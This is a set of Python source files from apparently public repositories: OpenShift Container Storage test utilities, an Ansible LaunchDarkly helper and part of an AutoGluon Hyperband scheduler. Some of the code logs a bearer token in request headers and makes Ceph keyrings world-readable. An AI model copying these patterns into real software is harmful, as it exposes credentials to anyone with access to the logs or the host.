{
"source": "jhutar/ocs-ci",
"score": 2
}
#### File: ocs_ci/utility/prometheus.py
```python
import base64
import logging
import os
import requests
import tempfile
import yaml
from ocs_ci.framework import config
from ocs_ci.ocs import constants, defaults
from ocs_ci.ocs.ocp import OCP
logger = logging.getLogger(name=__file__)
class PrometheusAPI(object):
"""
This is a wrapper class for the Prometheus API.
"""
_token = None
_user = None
_password = None
_endpoint = None
_cacert = None
def __init__(self, user=None, password=None):
"""
Constructor for PrometheusAPI class.
Args:
user (str): OpenShift username used to connect to API
password (str): OpenShift password; when not provided, it is read from
the password file given by config.RUN['password_location'] under the cluster path
"""
self._user = user or config.RUN['username']
if not password:
filename = os.path.join(
config.ENV_DATA['cluster_path'],
config.RUN['password_location']
)
with open(filename) as f:
password = f.read()
self._password = password
self.refresh_connection()
self.generate_cert()
def refresh_connection(self):
"""
Login into OCP, refresh endpoint and token.
"""
ocp = OCP(
kind=constants.ROUTE,
namespace=defaults.OCS_MONITORING_NAMESPACE
)
assert ocp.login(self._user, self._password), 'Login to OCP failed'
self._token = ocp.get_user_token()
route_obj = ocp.get(
resource_name=defaults.PROMETHEUS_ROUTE
)
self._endpoint = 'https://' + route_obj['spec']['host']
def generate_cert(self):
"""
Generate CA certificate from kubeconfig for API.
TODO: find proper way how to generate/load cert files.
"""
kubeconfig_path = os.path.join(
config.ENV_DATA['cluster_path'],
config.RUN['kubeconfig_location']
)
with open(kubeconfig_path, "r") as f:
kubeconfig = yaml.load(f, yaml.Loader)
cert_file = tempfile.NamedTemporaryFile(delete=False)
cert_file.write(
base64.b64decode(
kubeconfig['clusters'][0]['cluster']['certificate-authority-data']
)
)
cert_file.close()
self._cacert = cert_file.name
logger.info(f"Generated CA certification file: {self._cacert}")
def get(self, resource, payload=None):
"""
Perform a GET request on a given Prometheus API resource.
Args:
resource (str): Represents part of uri that specifies given
resource.
payload (dict): Provide parameters to GET API call.
e.g. for `alerts` resource this can be
{'silenced': False, 'inhibited': False}
Returns:
requests.Response: Raw response from the Prometheus API
"""
pattern = f"/api/v1/{resource}"
headers = {'Authorization': f"Bearer {self._token}"}
logger.info(f"GET {self._endpoint + pattern}")
logger.info(f"headers={headers}")
logger.info(f"verify={self._cacert}")
logger.info(f"params={payload}")
response = requests.get(
self._endpoint + pattern,
headers=headers,
verify=self._cacert,
params=payload
)
return response
```
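A brief usage sketch for the wrapper above (it assumes a deployed cluster whose credentials are reachable through the ocs-ci config, and the standard Prometheus `/api/v1/alerts` response layout):
```python
# Sketch only: requires a running cluster configured for ocs-ci.
from ocs_ci.utility.prometheus import PrometheusAPI

api = PrometheusAPI()
# 'alerts' is the resource part of the URI; the payload filters match the
# example given in the get() docstring above.
response = api.get('alerts', payload={'silenced': False, 'inhibited': False})
response.raise_for_status()
alerts = response.json()['data']['alerts']
print(f"Number of alerts returned: {len(alerts)}")
```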
#### File: ocs_ci/utility/utils.py
```python
import json
import logging
import os
import platform
import random
import shlex
import string
import subprocess
import time
import traceback
import requests
import yaml
import re
import smtplib
from ocs_ci.ocs.exceptions import (
CommandFailed, UnsupportedOSType, TimeoutExpiredError,
)
from ocs_ci.framework import config
from ocs_ci.utility.aws import AWS
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from ocs_ci.ocs import constants
from bs4 import BeautifulSoup
log = logging.getLogger(__name__)
# variables
mounting_dir = '/mnt/cephfs/'
clients = []
md5sum_list1 = []
md5sum_list2 = []
fuse_clients = []
kernel_clients = []
mon_node = ''
mon_node_ip = ''
mds_nodes = []
md5sum_file_lock = []
active_mdss = []
RC = []
failure = {}
output = []
unique_test_names = []
# function for getting the clients
def get_client_info(ceph_nodes, clients):
log.info("Getting Clients")
for node in ceph_nodes:
if node.role == 'client':
clients.append(node)
# Identifying MON node
for node in ceph_nodes:
if node.role == 'mon':
mon_node = node
out, err = mon_node.exec_command(cmd='sudo hostname -I')
mon_node_ip = out.read().decode().rstrip('\n')
break
for node in ceph_nodes:
if node.role == 'mds':
mds_nodes.append(node)
for node in clients:
node.exec_command(cmd='sudo yum install -y attr')
fuse_clients = clients[0:2] # separating clients for fuse and kernel
kernel_clients = clients[2:4]
return fuse_clients, kernel_clients, mon_node, mounting_dir, mds_nodes, md5sum_file_lock, mon_node_ip
# function for providing authorization to the clients from MON node
def auth_list(clients, mon_node):
for node in clients:
log.info("Giving required permissions for clients from MON node:")
mon_node.exec_command(
cmd="sudo ceph auth get-or-create client.%s mon 'allow *' mds 'allow *, allow rw path=/' "
"osd 'allow rw pool=cephfs_data' -o /etc/ceph/ceph.client.%s.keyring" % (node.hostname, node.hostname))
out, err = mon_node.exec_command(
sudo=True, cmd='cat /etc/ceph/ceph.client.%s.keyring' % (node.hostname))
keyring = out.read().decode()
key_file = node.write_file(
sudo=True,
file_name='/etc/ceph/ceph.client.%s.keyring' % (node.hostname),
file_mode='w')
key_file.write(keyring)
key_file.flush()
node.exec_command(cmd="sudo chmod 644 /etc/ceph/ceph.client.%s.keyring" % (node.hostname))
# creating mounting directory
node.exec_command(cmd='sudo mkdir %s' % (mounting_dir))
# Mounting single FS with ceph-fuse
def fuse_mount(fuse_clients, mounting_dir):
try:
for client in fuse_clients:
log.info("Creating mounting dir:")
log.info("Mounting fs with ceph-fuse on client %s:" % (client.hostname))
client.exec_command(cmd="sudo ceph-fuse -n client.%s %s" % (client.hostname, mounting_dir))
out, err = client.exec_command(cmd='mount')
mount_output = out.read().decode()
mount_output.split()
log.info("Checking if fuse mount is is passed of failed:")
if 'fuse' in mount_output:
log.info("ceph-fuse mounting passed")
else:
log.error("ceph-fuse mounting failed")
return md5sum_list1
except Exception as e:
log.error(e)
def kernel_mount(mounting_dir, mon_node_ip, kernel_clients):
try:
for client in kernel_clients:
out, err = client.exec_command(cmd='sudo ceph auth get-key client.%s' % (client.hostname))
secret_key = out.read().decode().rstrip('\n')
mon_node_ip = mon_node_ip.replace(" ", "")
client.exec_command(
cmd='sudo mount -t ceph %s:6789:/ %s -o name=%s,secret=%s' % (
mon_node_ip, mounting_dir, client.hostname, secret_key))
out, err = client.exec_command(cmd='mount')
mount_output = out.read().decode()
mount_output.split()
log.info("Checking if kernel mount is is passed of failed:")
if '%s:6789:/' % (mon_node_ip) in mount_output:
log.info("kernel mount passed")
else:
log.error("kernel mount failed")
return md5sum_list2
except Exception as e:
log.error(e)
def fuse_client_io(client, mounting_dir):
try:
rand_count = random.randint(1, 5)
rand_bs = random.randint(100, 300)
log.info("Performing IOs on fuse-clients")
client.exec_command(
cmd="sudo dd if=/dev/zero of=%snewfile_%s bs=%dM count=%d" %
(mounting_dir, client.hostname, rand_bs, rand_count),
long_running=True)
except Exception as e:
log.error(e)
def kernel_client_io(client, mounting_dir):
try:
rand_count = random.randint(1, 6)
rand_bs = random.randint(100, 500)
log.info("Performing IOs on kernel-clients")
client.exec_command(
cmd="sudo dd if=/dev/zero of=%snewfile_%s bs=%dM count=%d" %
(mounting_dir, client.hostname, rand_bs, rand_count),
long_running=True)
except Exception as e:
log.error(e)
def fuse_client_md5(fuse_clients, md5sum_list1):
try:
log.info("Calculating MD5 sums of files in fuse-clients:")
for client in fuse_clients:
md5sum_list1.append(
client.exec_command(cmd="sudo md5sum %s* | awk '{print $1}' " % (mounting_dir), long_running=True))
except Exception as e:
log.error(e)
def kernel_client_md5(kernel_clients, md5sum_list2):
try:
log.info("Calculating MD5 sums of files in kernel-clients:")
for client in kernel_clients:
md5sum_list2.append(
client.exec_command(cmd="sudo md5sum %s* | awk '{print $1}' " % (mounting_dir), long_running=True))
except Exception as e:
log.error(e)
# checking file locking mechanism
def file_locking(client):
try:
to_lock_file = """
import fcntl
import subprocess
import time
try:
f = open('/mnt/cephfs/to_test_file_lock', 'w+')
fcntl.lockf(f, fcntl.LOCK_EX | fcntl.LOCK_NB)
print "locking file:--------------------------------"
subprocess.check_output(["sudo","dd","if=/dev/zero","of=/mnt/cephfs/to_test_file_lock","bs=1M","count=2"])
except IOError as e:
print e
finally:
print "Unlocking file:------------------------------"
fcntl.lockf(f,fcntl.LOCK_UN)
"""
to_lock_code = client.write_file(
sudo=True,
file_name='/home/cephuser/file_lock.py',
file_mode='w')
to_lock_code.write(to_lock_file)
to_lock_code.flush()
out, err = client.exec_command(cmd="sudo python /home/cephuser/file_lock.py")
output = out.read().decode()
output.split()
if 'Errno 11' in output:
log.info("File locking achieved, data is not corrupted")
elif 'locking' in output:
log.info("File locking achieved, data is not corrupted")
else:
log.error("Data is corrupted")
out, err = client.exec_command(cmd="sudo md5sum %sto_test_file_lock | awk '{print $1}'" % (mounting_dir))
md5sum_file_lock.append(out.read().decode())
except Exception as e:
log.error(e)
def activate_multiple_mdss(mds_nodes):
try:
log.info("Activating Multiple MDSs")
for node in mds_nodes:
out1, err = node.exec_command(cmd="sudo ceph fs set cephfs allow_multimds true --yes-i-really-mean-it")
out2, err = node.exec_command(cmd="sudo ceph fs set cephfs max_mds 2")
break
except Exception as e:
log.error(e)
def mkdir_pinning(clients, range1, range2, dir_name, pin_val):
try:
log.info("Creating Directories and Pinning to MDS %s" % (pin_val))
for client in clients:
for num in range(range1, range2):
out, err = client.exec_command(cmd='sudo mkdir %s%s_%d' % (mounting_dir, dir_name, num))
if pin_val != '':
client.exec_command(
cmd='sudo setfattr -n ceph.dir.pin -v %s %s%s_%d' % (pin_val, mounting_dir, dir_name, num))
else:
print("Pin val not given")
print(out.read().decode())
print(time.time())
break
except Exception as e:
log.error(e)
def allow_dir_fragmentation(mds_nodes):
try:
log.info("Allowing directorty fragmenation for splitting")
for node in mds_nodes:
node.exec_command(cmd='sudo ceph fs set cephfs allow_dirfrags 1')
break
except Exception as e:
log.error(e)
def mds_fail_over(mds_nodes):
try:
rand = random.randint(0, 1)
for node in mds_nodes:
log.info("Failing MDS %d" % (rand))
node.exec_command(cmd='sudo ceph mds fail %d' % (rand))
break
except Exception as e:
log.error(e)
def pinned_dir_io(clients, mds_fail_over, num_of_files, range1, range2):
try:
log.info("Performing IOs and MDSfailovers on clients")
for client in clients:
client.exec_command(cmd='sudo pip install crefi')
for num in range(range1, range2):
if mds_fail_over != '':
mds_fail_over(mds_nodes)
out, err = client.exec_command(cmd='sudo crefi -n %d %sdir_%d' % (num_of_files, mounting_dir, num))
rc = out.channel.recv_exit_status()
print(out.read().decode())
RC.append(rc)
print(time.time())
if rc == 0:
log.info("Client IO is going on,success")
else:
log.error("Client IO got interrupted")
failure.update({client: out})
break
break
except Exception as e:
log.error(e)
def custom_ceph_config(suite_config, custom_config, custom_config_file):
"""
Combines and returns custom configuration overrides for ceph.
Hierarchy is as follows:
custom_config > custom_config_file > suite_config
Args:
suite_config: ceph_conf_overrides that currently exist in the test suite
custom_config: custom config args provided by the cli (these all go to the global scope)
custom_config_file: path to custom config yaml file provided by the cli
Returns:
New value to be used for ceph_conf_overrides in test config
"""
log.debug("Suite config: {}".format(suite_config))
log.debug("Custom config: {}".format(custom_config))
log.debug("Custom config file: {}".format(custom_config_file))
full_custom_config = suite_config or {}
cli_config_dict = {}
custom_config_dict = {}
# retrieve custom config from file
if custom_config_file:
with open(custom_config_file) as f:
custom_config_dict = yaml.safe_load(f)
log.info("File contents: {}".format(custom_config_dict))
# format cli configs into dict
if custom_config:
cli_config_dict = dict(item.split('=') for item in custom_config)
# combine file and cli configs
if cli_config_dict:
if not custom_config_dict.get('global'):
custom_config_dict['global'] = {}
for key, value in cli_config_dict.items():
custom_config_dict['global'][key] = value
# combine file and suite configs
for key, value in custom_config_dict.items():
subsection = {}
if full_custom_config.get(key):
subsection.update(full_custom_config[key])
subsection.update(value)
full_custom_config[key] = subsection
log.info("Full custom config: {}".format(full_custom_config))
return full_custom_config
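# Illustrative example (hypothetical values) of the precedence described in the
# docstring above (custom_config > custom_config_file > suite_config):
#   custom_ceph_config(
#       suite_config={'global': {'osd_pool_default_size': 2}},
#       custom_config=['mon_max_pg_per_osd=400'],  # CLI overrides land in 'global'
#       custom_config_file=None,
#   )
#   returns {'global': {'osd_pool_default_size': 2, 'mon_max_pg_per_osd': '400'}}
#   (note the CLI value stays a string, since it is only split on '=')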
def run_cmd(cmd, **kwargs):
"""
Run an arbitrary command locally
Args:
cmd (str): command to run
Raises:
CommandFailed: In case the command execution fails
Returns:
(str) Decoded stdout of command
"""
log.info(f"Executing command: {cmd}")
if isinstance(cmd, str):
cmd = shlex.split(cmd)
r = subprocess.run(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
**kwargs
)
log.debug(f"Command output: {r.stdout.decode()}")
if r.stderr and not r.returncode:
log.warning(f"Command warning:: {r.stderr.decode()}")
if r.returncode:
raise CommandFailed(
f"Error during execution of command: {cmd}."
f"\nError is {r.stderr.decode()}"
)
return r.stdout.decode()
def download_file(url, filename):
"""
Download a file from a specified url
Args:
url (str): URL of the file to download
filename (str): Name of the file to write the download to
"""
log.debug(f"Download '{url}' to '{filename}'.")
with open(filename, "wb") as f:
r = requests.get(url)
f.write(r.content)
assert r.ok
def destroy_cluster(cluster_path, log_level="DEBUG"):
"""
Destroy existing cluster resources in AWS.
Args:
cluster_path (str): filepath to cluster directory to be destroyed
log_level (str): log level to set for openshift_installer
"""
# Download installer
installer = get_openshift_installer()
destroy_cmd = (
f"{installer} destroy cluster "
f"--dir {cluster_path} "
f"--log-level {log_level}"
)
try:
cluster_path = os.path.normpath(cluster_path)
# Retrieve cluster name and aws region from metadata
metadata_file = os.path.join(cluster_path, "metadata.json")
with open(metadata_file) as f:
metadata = json.loads(f.read())
cluster_name = metadata.get("clusterName")
region_name = metadata.get("aws").get("region")
# Execute destroy cluster using OpenShift installer
log.info(f"Destroying cluster defined in {cluster_path}")
run_cmd(destroy_cmd)
# Find and delete volumes
aws = AWS(region_name)
volume_pattern = f"{cluster_name}*"
log.debug(f"Finding volumes with pattern: {volume_pattern}")
volumes = aws.get_volumes_by_name_pattern(volume_pattern)
log.debug(f"Found volumes: \n {volumes}")
for volume in volumes:
aws.detach_and_delete_volume(volume)
# Remove installer
delete_file(installer)
except Exception:
log.error(traceback.format_exc())
def get_openshift_installer(
version=None,
bin_dir=None,
force_download=False,
):
"""
Download the OpenShift installer binary, if not already present.
Update env. PATH and get path of the openshift installer binary.
Args:
version (str): Version of the installer to download
bin_dir (str): Path to bin directory (default: config.RUN['bin_dir'])
force_download (bool): Force installer download even if already present
Returns:
str: Path to the installer binary
"""
version = version or config.DEPLOYMENT['installer_version']
bin_dir = os.path.expanduser(bin_dir or config.RUN['bin_dir'])
installer_filename = "openshift-install"
installer_binary_path = os.path.join(bin_dir, installer_filename)
if os.path.isfile(installer_binary_path) and force_download:
delete_file(installer_binary_path)
if os.path.isfile(installer_binary_path):
log.debug(f"Installer exists ({installer_binary_path}), skipping download.")
# TODO: check installer version
else:
log.info(f"Downloading openshift installer ({version}).")
prepare_bin_dir()
# record current working directory and switch to BIN_DIR
previous_dir = os.getcwd()
os.chdir(bin_dir)
tarball = f"{installer_filename}.tar.gz"
url = get_openshift_mirror_url(installer_filename, version)
download_file(url, tarball)
run_cmd(f"tar xzvf {tarball} {installer_filename}")
delete_file(tarball)
# return to the previous working directory
os.chdir(previous_dir)
installer_version = run_cmd(f"{installer_binary_path} version")
log.info(f"OpenShift Installer version: {installer_version}")
return installer_binary_path
def get_openshift_client(
version=None,
bin_dir=None,
force_download=False,
):
"""
Download the OpenShift client binary, if not already present.
Update env. PATH and get path of the oc binary.
Args:
version (str): Version of the client to download
(default: config.RUN['client_version'])
bin_dir (str): Path to bin directory (default: config.RUN['bin_dir'])
force_download (bool): Force client download even if already present
Returns:
str: Path to the client binary
"""
version = version or config.RUN['client_version']
bin_dir = os.path.expanduser(bin_dir or config.RUN['bin_dir'])
client_binary_path = os.path.join(bin_dir, 'oc')
if os.path.isfile(client_binary_path) and force_download:
delete_file(client_binary_path)
if os.path.isfile(client_binary_path):
log.debug(f"Client exists ({client_binary_path}), skipping download.")
# TODO: check client version
else:
log.info(f"Downloading openshift client ({version}).")
prepare_bin_dir()
# record current working directory and switch to BIN_DIR
previous_dir = os.getcwd()
os.chdir(bin_dir)
url = get_openshift_mirror_url('openshift-client', version)
tarball = "openshift-client.tar.gz"
download_file(url, tarball)
run_cmd(f"tar xzvf {tarball} oc kubectl")
delete_file(tarball)
# return to the previous working directory
os.chdir(previous_dir)
client_version = run_cmd(f"{client_binary_path} version")
log.info(f"OpenShift Client version: {client_version}")
return client_binary_path
def get_openshift_mirror_url(file_name, version):
"""
Format url to OpenShift mirror (for client and installer download).
Args:
file_name (str): Name of file
version (str): Version of the installer or client to download
Returns:
str: Url of the desired file (installer or client)
"""
if platform.system() == "Darwin":
os_type = "mac"
elif platform.system() == "Linux":
os_type = "linux"
else:
raise UnsupportedOSType
url = (
f"https://mirror.openshift.com/pub/openshift-v4/clients/ocp/"
f"{version}/{file_name}-{os_type}-{version}.tar.gz"
)
return url
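# Illustrative result (hypothetical version string), on Linux:
#   get_openshift_mirror_url("openshift-install", "4.2.0")
#   -> "https://mirror.openshift.com/pub/openshift-v4/clients/ocp/4.2.0/openshift-install-linux-4.2.0.tar.gz"
# On Darwin, "mac" is substituted for the os_type part.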
def prepare_bin_dir(bin_dir=None):
"""
Prepare bin directory for OpenShift client and installer
Args:
bin_dir (str): Path to bin directory (default: config.RUN['bin_dir'])
"""
bin_dir = os.path.expanduser(bin_dir or config.RUN['bin_dir'])
try:
os.mkdir(bin_dir)
log.info(f"Directory '{bin_dir}' successfully created.")
except FileExistsError:
log.debug(f"Directory '{bin_dir}' already exists.")
def add_path_to_env_path(path):
"""
Add path to the PATH environment variable (if not already there).
Args:
path (str): Path which should be added to the PATH env. variable
"""
env_path = os.environ['PATH'].split(os.pathsep)
if path not in env_path:
os.environ['PATH'] = os.pathsep.join([path] + env_path)
log.info(f"Path '{path}' added to the PATH environment variable.")
log.debug(f"PATH: {os.environ['PATH']}")
def delete_file(file_name):
"""
Delete file_name
Args:
file_name (str): Path to the file you want to delete
"""
os.remove(file_name)
class TimeoutSampler(object):
"""
Samples the function output.
This is a generator object that at first yields the output of function
`func`. After the yield, it either raises instance of `timeout_exc_cls` or
sleeps `sleep` seconds.
Yielding the output allows you to handle every value as you wish.
Feel free to set the instance variables.
"""
def __init__(self, timeout, sleep, func, *func_args, **func_kwargs):
self.timeout = timeout
''' Timeout in seconds. '''
self.sleep = sleep
''' Sleep interval seconds. '''
self.func = func
''' A function to sample. '''
self.func_args = func_args
''' Args for func. '''
self.func_kwargs = func_kwargs
''' Kwargs for func. '''
self.start_time = None
''' Time of starting the sampling. '''
self.last_sample_time = None
''' Time of last sample. '''
self.timeout_exc_cls = TimeoutExpiredError
''' Class of exception to be raised. '''
self.timeout_exc_args = (self.timeout,)
''' An args for __init__ of the timeout exception. '''
def __iter__(self):
if self.start_time is None:
self.start_time = time.time()
while True:
self.last_sample_time = time.time()
try:
yield self.func(*self.func_args, **self.func_kwargs)
except Exception:
pass
if self.timeout < (time.time() - self.start_time):
raise self.timeout_exc_cls(*self.timeout_exc_args)
time.sleep(self.sleep)
def wait_for_func_status(self, result):
"""
Run the sampled function until it returns the expected result or the
timeout expires (uses the __iter__ method).
Args:
result (bool): Expected result from func.
Examples:
sample = TimeoutSampler(
timeout=60, sleep=1, func=some_func, func_arg1="1",
func_arg2="2"
)
if not sample.wait_for_func_status(result=True):
raise Exception
"""
try:
for res in self:
if result == res:
return True
except self.timeout_exc_cls:
log.error(
f"({self.func.__name__}) return incorrect status after timeout"
)
return False
def get_random_str(size=13):
"""
Generates a random string of the given size.
Args:
size (int): number of random characters to generate
Returns:
str : string of random characters of given size
"""
chars = string.ascii_lowercase + string.digits
return ''.join(random.choice(chars) for _ in range(size))
def run_async(command):
"""
Run command locally and return without waiting for completion
Args:
command (str): The command to run.
Returns:
An open descriptor to be used by the calling function.
Example:
command = 'oc delete pvc pvc1'
proc = run_async(command)
ret, out, err = proc.async_communicate()
"""
log.info(f"Executing command: {command}")
popen_obj = subprocess.Popen(
command, stdin=subprocess.PIPE, stdout=subprocess.PIPE, shell=True,
encoding='utf-8'
)
def async_communicate():
"""
Wait for command to complete and fetch the result
Returns:
retcode, stdout, stderr of the command
"""
stdout, stderr = popen_obj.communicate()
retcode = popen_obj.returncode
return retcode, stdout, stderr
popen_obj.async_communicate = async_communicate
return popen_obj
def is_cluster_running(cluster_path):
from ocs_ci.ocs.openshift_ops import OCP
return config.RUN['cli_params'].get('cluster_path') and OCP.set_kubeconfig(
os.path.join(cluster_path, config.RUN.get('kubeconfig_location'))
)
def decompose_html_attributes(soup, attributes):
"""
Decomposes the given html attributes
Args:
soup (obj): BeautifulSoup object
attributes (list): attributes to decompose
Returns: None
"""
for attribute in attributes:
tg = soup.find_all(attrs={"class": attribute})
for each in tg:
each.decompose()
def parse_html_for_email(soup):
"""
Parses the html and filters out the unnecessary data/tags/attributes
for email reporting
Args:
soup (obj): BeautifulSoup object
"""
decompose_html_attributes(soup, ["extra", "col-links"])
soup.find(id="not-found-message").decompose()
for tr in soup.find_all('tr'):
for th in tr.find_all('th'):
if "Links" in th.text:
th.decompose()
for p in soup.find_all('p'):
if "(Un)check the boxes to filter the results." in p.text:
p.decompose()
if "pytest-html" in p.text:
data = p.text.split("by")[0]
p.string = data
for ip in soup.find_all('input'):
if not ip.has_attr('disabled'):
ip['disabled'] = 'true'
for td in soup.find_all('td'):
if "pytest" in td.text or "html" in td.text:
data = td.text.replace('&apos', '')
td.string = data
main_header = soup.find('h1')
main_header.string.replace_with('OCS-CI RESULTS')
def email_reports():
"""
Email results of test run
"""
mailids = config.RUN['cli_params']['email']
recipients = mailids.split(",")
sender = "<EMAIL>"
msg = MIMEMultipart('alternative')
msg['Subject'] = f"ocs-ci results for RUN ID: {config.RUN['run_id']}"
msg['From'] = sender
msg['To'] = ", ".join(recipients)
html = config.RUN['cli_params']['--html']
html_data = open(os.path.expanduser(html)).read()
soup = BeautifulSoup(html_data, "html.parser")
parse_html_for_email(soup)
part1 = MIMEText(soup, 'html')
msg.attach(part1)
try:
s = smtplib.SMTP('localhost')
s.sendmail(sender, recipients, msg.as_string())
s.quit()
log.info(f"Results have been emailed to {recipients}")
except Exception as e:
log.exception(e)
def get_cluster_version_info():
"""
Gets the complete cluster version information
Returns:
dict: cluster version information
"""
# importing here to avoid circular imports
from ocs_ci.ocs.ocp import OCP
ocp = OCP(kind="clusterversion")
cluster_version_info = ocp.get("version")
return cluster_version_info
def get_cluster_version():
"""
Gets the cluster version
Returns:
str: cluster version
"""
return get_cluster_version_info()["status"]["desired"]["version"]
def get_cluster_image():
"""
Gets the cluster image
Returns:
str: cluster image
"""
return get_cluster_version_info()["status"]["desired"]["image"]
def get_ceph_version():
"""
Gets the ceph version
Returns:
str: ceph version
"""
# importing here to avoid circular imports
from ocs_ci.ocs.resources import pod
ct_pod = pod.get_ceph_tools_pod()
ceph_version = ct_pod.exec_ceph_cmd("ceph version")
return re.split(r'ceph version ', ceph_version['version'])[1]
def get_rook_version():
"""
Gets the rook version
Returns:
str: rook version
"""
# importing here to avoid circular imports
from ocs_ci.ocs.resources import pod
ct_pod = pod.get_ceph_tools_pod()
rook_versions = ct_pod.exec_ceph_cmd("rook version", format='')
return rook_versions['rook']
def get_csi_versions():
"""
Gets the CSI related version information
Returns:
dict: CSI related version information
"""
csi_versions = {}
# importing here to avoid circular imports
from ocs_ci.ocs.ocp import OCP
ocp_pod_obj = OCP(
kind=constants.POD, namespace=config.ENV_DATA['cluster_namespace']
)
csi_provisioners = [
'csi-cephfsplugin-provisioner',
'csi-rbdplugin-provisioner'
]
for provisioner in csi_provisioners:
csi_provisioner_pod = run_cmd(
f"oc -n {config.ENV_DATA['cluster_namespace']} get pod -l "
f"'app={provisioner}' -o jsonpath='{{.items[0].metadata.name}}'"
)
desc = ocp_pod_obj.get(csi_provisioner_pod)
for container in desc['spec']['containers']:
name = container['image'].split("/")[-1].split(":")[0]
version = container['image'].split("/")[-1].split(":")[1]
csi_versions[name] = version
return csi_versions
def create_directory_path(path):
"""
Creates the directory if the path doesn't exist
"""
path = os.path.expanduser(path)
if not os.path.exists(path):
os.makedirs(path)
else:
log.debug(f"{path} already exists")
def ocsci_log_path():
"""
Construct the full path for the log directory.
Returns:
str: full path for ocs-ci log directory
"""
return os.path.expanduser(
os.path.join(
config.RUN['log_dir'],
f"ocs-ci-logs-{config.RUN['run_id']}"
)
)
```
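A short sketch (with a hypothetical placeholder command) tying together two helpers documented above: `run_async()` starts a local process without blocking, and `TimeoutSampler` polls it until it finishes or the timeout expires.
```python
# Sketch only: 'sleep 2' is a placeholder command.
from ocs_ci.utility.utils import TimeoutSampler, run_async

proc = run_async("sleep 2")
sample = TimeoutSampler(timeout=30, sleep=1, func=lambda: proc.poll() is not None)
assert sample.wait_for_func_status(result=True), "command did not finish in time"
ret, out, err = proc.async_communicate()
assert ret == 0
```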
#### File: ocs-ci/tests/test_fio_workload.py
```python
import pytest
import logging
from ocs_ci.ocs import constants, exceptions
from ocs_ci.ocs import workload
from ocs_ci.framework.testlib import ManageTest
from ocs_ci.utility.utils import TimeoutSampler
from ocs_ci.utility import templating
from tests.fixtures import (
create_rbd_storageclass, create_rbd_pod, create_pvc, create_ceph_block_pool,
create_rbd_secret, delete_pvc, delete_pod, create_project
)
logger = logging.getLogger(__name__)
@pytest.mark.usefixtures(
create_rbd_secret.__name__,
create_ceph_block_pool.__name__,
create_rbd_storageclass.__name__,
create_project.__name__,
create_pvc.__name__,
create_rbd_pod.__name__,
delete_pvc.__name__,
delete_pod.__name__
)
class TestFIOWorkload(ManageTest):
def test_fio_with_block_storage(self):
name = 'test_workload'
spec = self.pod_obj.data.get('spec')
path = (
spec.get('containers')[0].get('volumeMounts')[0].get('mountPath')
)
work_load = 'fio'
storage_type = 'fs'
# few io parameters for Fio
runtime = 10
size = '200M'
wl = workload.WorkLoad(
name, path, work_load, storage_type, self.pod_obj
)
assert wl.setup()
io_params = templating.load_yaml_to_dict(constants.FIO_IO_PARAMS_YAML)
io_params['runtime'] = runtime
io_params['size'] = size
future_result = wl.run(**io_params)
timeout = 1200
sample = TimeoutSampler(
timeout=timeout, sleep=3, func=future_result.done
)
assert sample.wait_for_func_status(result=True)
try:
logger.info(future_result.result())
except exceptions.CommandFailed:
logger.exception(f"FIO failed")
raise
except Exception:
logger.exception(f"Found Exception")
raise
```
{
"source": "jhutchings1/ansible-launchdarkly-collection",
"score": 2
}
#### File: plugins/module_utils/environment.py
```python
import launchdarkly_api

def ld_env_arg_spec():
return dict(
environment_key=dict(type="str", required=True, aliases=["key"]),
color=dict(type="str"),
name=dict(type="str"),
default_ttl=dict(type="int"),
tags=dict(type="list", elements="str"),
confirm_changes=dict(type="bool"),
require_comments=dict(type="bool"),
default_track_events=dict(type="bool"),
)
def env_ld_builder(environments):
patches = []
for env in environments:
env_mapped = dict(
(launchdarkly_api.Environment.attribute_map[k], v)
for k, v in env.items()
if v is not None
)
patches.append(launchdarkly_api.EnvironmentPost(**env))
return patches
```
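As a usage sketch, the argument spec above would typically feed `AnsibleModule` in a module of this collection; the module_utils import path below is an assumption and may differ in the actual collection layout.
```python
# Sketch only: the collection import path is an assumption.
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.launchdarkly_labs.collection.plugins.module_utils.environment import (
    ld_env_arg_spec,
)


def main():
    # Build the module from the shared environment argument spec.
    module = AnsibleModule(argument_spec=ld_env_arg_spec(), supports_check_mode=True)
    module.exit_json(changed=False, environment_key=module.params["environment_key"])


if __name__ == "__main__":
    main()
```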
{
"source": "jhutchings1/autogluon",
"score": 3
}
#### File: autogluon/scheduler/hyperband_stopping.py
```python
import logging
import numpy as np
import copy
logger = logging.getLogger(__name__)
def map_resource_to_index(resource, rf, min_t, max_t):
max_rungs = int(np.log(max_t / min_t) / np.log(rf) + 1)
index = int(np.round(np.log(resource * max_t / min_t) / np.log(rf)))
index = max(min(index, max_rungs - 1), 0)
return index
def _sample_bracket(num_brackets, max_num_rungs, rf):
# Brackets are sampled in proportion to the number of configs started
# in synchronous Hyperband in each bracket
if num_brackets > 1:
smax_plus1 = max_num_rungs
probs = np.array([
(smax_plus1 / (smax_plus1 - s)) * (rf ** (smax_plus1 - s - 1))
for s in range(num_brackets)])
normalized = probs / probs.sum()
return np.random.choice(num_brackets, p=normalized)
else:
return 0
class HyperbandStopping_Manager(object):
"""Hyperband Manager
Implements stopping rule which uses the brackets and rung levels defined
in Hyperband. The overall algorithm is NOT what is published as ASHA
(see HyperbandPromotion_Manager), but rather something resembling the
median rule.
Args:
time_attr: str
See HyperbandScheduler.
reward_attr: str
See HyperbandScheduler.
max_t: int
See HyperbandScheduler.
grace_period: int
See HyperbandScheduler.
reduction_factor: int
See HyperbandScheduler.
brackets: int
See HyperbandScheduler.
"""
def __init__(
self, time_attr, reward_attr, max_t, grace_period,
reduction_factor, brackets):
self._reward_attr = reward_attr
self._time_attr = time_attr
self._reduction_factor = reduction_factor
self._max_t = max_t
self._min_t = grace_period
# Maps str(task_id) -> bracket_id
self._task_info = dict()
self._num_stopped = 0
self._brackets = []
for s in range(brackets):
bracket = StoppingBracket(
grace_period, max_t, reduction_factor, s)
if not bracket._rungs:
break
self._brackets.append(bracket)
def on_task_add(self, task, **kwargs):
"""
Since the bracket has already been sampled in on_task_schedule,
not much is done here.
We return the list of milestones for this bracket in reverse
(decreasing) order. The first entry is max_t, even if it is
not a milestone in the bracket. This list contains the resource
levels the task would reach if it ran to max_t without being stopped.
:param task: Only task.task_id is used
:return: See above
"""
assert 'bracket' in kwargs
bracket_id = kwargs['bracket']
bracket = self._brackets[bracket_id]
self._task_info[str(task.task_id)] = bracket_id
levels = [x[0] for x in bracket._rungs]
if levels[0] < self._max_t:
levels.insert(0, self._max_t)
return levels
